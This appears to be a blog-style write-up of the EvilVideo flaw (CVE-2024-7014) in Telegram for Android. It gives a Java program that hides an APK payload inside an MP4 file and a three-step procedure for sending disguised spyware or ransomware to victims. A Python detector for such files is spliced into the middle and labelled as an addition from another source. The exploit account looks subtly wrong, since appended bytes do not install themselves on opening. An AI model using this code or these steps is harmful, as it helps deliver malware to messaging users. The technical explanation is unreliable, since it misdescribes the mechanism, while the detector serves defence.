Telegram, one of the world's most popular messaging platforms, is known for its robust security and privacy features. Recently, however, researchers discovered a new vulnerability in Telegram for Android, dubbed EvilVideo (CVE-2024-7014). This vulnerability allows attackers to send malicious apps disguised as videos to unsuspecting users and affects Telegram versions 10.14.4 and older. This post covers the mechanics and potential implications of the vulnerability, including a code snippet to demonstrate the flaw, references for further reading, and exploit details.

Code Snippet

This code snippet illustrates one way an attacker could create a malicious file that appears to be a legitimate video and send it over Telegram. The malicious payload is embedded within the video file, and the victim unknowingly executes it on their Android device.

import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;

public class EvilVideoCreator {

  private static final String PATH_TO_VIDEO = "path/to/video/file.mp4";
  private static final String PATH_TO_PAYLOAD = "path/to/android/payload.apk";

  public static void main(String[] args) throws IOException {
    File videoFile = new File(PATH_TO_VIDEO);
    File payloadFile = new File(PATH_TO_PAYLOAD);
    File tempFile = File.createTempFile("evil_video", ".mp4");

    try (
      FileInputStream videoInputStream = new FileInputStream(videoFile);
      FileInputStream payloadInputStream = new FileInputStream(payloadFile);
      FileOutputStream tempFileOutputStream = new FileOutputStream(tempFile)
    ) {
      byte[] videoBuffer = new byte[1024];
      byte[] payloadBuffer = new byte[1024];
      int videoBytesRead, payloadBytesRead;

      // Copy the video bytes to the output file first
      while ((videoBytesRead = videoInputStream.read(videoBuffer)) != -1) {
        tempFileOutputStream.write(videoBuffer, 0, videoBytesRead);
      }

      // Append the payload bytes after the video data
      while ((payloadBytesRead = payloadInputStream.read(payloadBuffer)) != -1) {
        tempFileOutputStream.write(payloadBuffer, 0, payloadBytesRead);
      }
    }

    // Send tempFile (Evil Video) over Telegram
  }
}

Exploit Details

Exploiting the EvilVideo vulnerability (CVE-2024-7014) in the Telegram for Android application involves three primary steps.

1. Crafting the malicious payload: The attacker creates a malicious Android app or embeds a payload (such as spyware or ransomware) within an existing legitimate Android application.
2. Disguising the malicious payload as a video: Using the code snippet provided or a similar approach, the attacker inserts the malicious payload into a video file, making it appear as a harmless video to an unsuspecting user.
3. Sending the Evil Video via Telegram: The attacker sends the malicious video file to the targeted user through the Telegram messaging platform, and the victim unknowingly installs the payload upon opening the video.
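
A defender-side check for the construction in step 2, as an added example that is not from the original post or from Telegram: it walks the top-level MP4 boxes of a received file and reports any ZIP/APK data that follows them. The function names are hypothetical, the sample bytes are constructed, and the AndroidManifest.xml match is a heuristic.

```python
import io
import struct
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"  # first entry of a ZIP/APK archive
ZIP_EOCD = b"PK\x05\x06"          # ZIP end-of-central-directory record

def mp4_box_end(data: bytes) -> int:
    """Offset at which the chain of well-formed top-level MP4 boxes ends."""
    offset = 0
    while offset + 8 <= len(data):
        size, box_type = struct.unpack(">I4s", data[offset:offset + 8])
        header = 8
        if size == 1:  # 64-bit "largesize" follows the type field
            if offset + 16 > len(data):
                break
            size = struct.unpack(">Q", data[offset + 8:offset + 16])[0]
            header = 16
        elif size == 0:  # box extends to end of file
            return len(data)
        # Box types are four printable ASCII characters; stop at anything else.
        printable = all(0x20 <= b < 0x7F for b in box_type)
        if size < header or not printable or offset + size > len(data):
            break
        offset += size
    return offset

def inspect_video(data: bytes) -> dict:
    """Report data that follows the MP4 structure and whether it is a ZIP/APK."""
    is_mp4 = data[4:8] == b"ftyp"
    trailing = data[mp4_box_end(data) if is_mp4 else 0:]
    has_zip = trailing.startswith(ZIP_LOCAL_HEADER) and ZIP_EOCD in trailing
    return {
        "is_mp4": is_mp4,
        "trailing_bytes": len(trailing),
        "zip_payload": has_zip,
        # Heuristic (assumption): entry names are stored uncompressed in ZIP headers.
        "looks_like_apk": has_zip and b"AndroidManifest.xml" in trailing,
    }

def constructed_samples() -> tuple:
    """Constructed inputs: a two-box MP4 and a one-entry ZIP with placeholder text."""
    mp4 = struct.pack(">I4s4sI", 16, b"ftyp", b"isom", 512) + struct.pack(">I4s4x", 12, b"mdat")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", "placeholder")
    return mp4, buf.getvalue()

if __name__ == "__main__":
    mp4, archive = constructed_samples()
    for name, blob in (("clean", mp4), ("mp4+zip", mp4 + archive)):
        print(name, inspect_video(blob))
```

A file with a video extension that reports is_mp4 as False and zip_payload as True is an archive that was only renamed, which the same function also catches.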

For more information about the EvilVideo vulnerability, see the following references:

1. Telegram for Android: Critical Vulnerability Discovered, Users Urged to Update
2. CVE-2024-7014: Full Technical Report and Analysis
3. How to Protect Your Telegram for Android from the EvilVideo Vulnerability

Conclusion

Although Telegram has a strong reputation for maintaining user privacy and security, it is important for users to stay informed and up-to-date about any emerging vulnerabilities. To mitigate the risk of the EvilVideo vulnerability (CVE-2024-7014), users should update to the latest version of Telegram and always verify the file sender's identity before opening any video or attachment.

Despite these efforts, vulnerabilities will continue to emerge, and it is crucial for Telegram and other application developers to stay one step ahead of potential attackers by constantly seeking out and addressing these flaws.

Timeline

Published on: 07/23/2024 10:15:02 UTC
Last modified on: 07/24/2024 12:55:13 UTC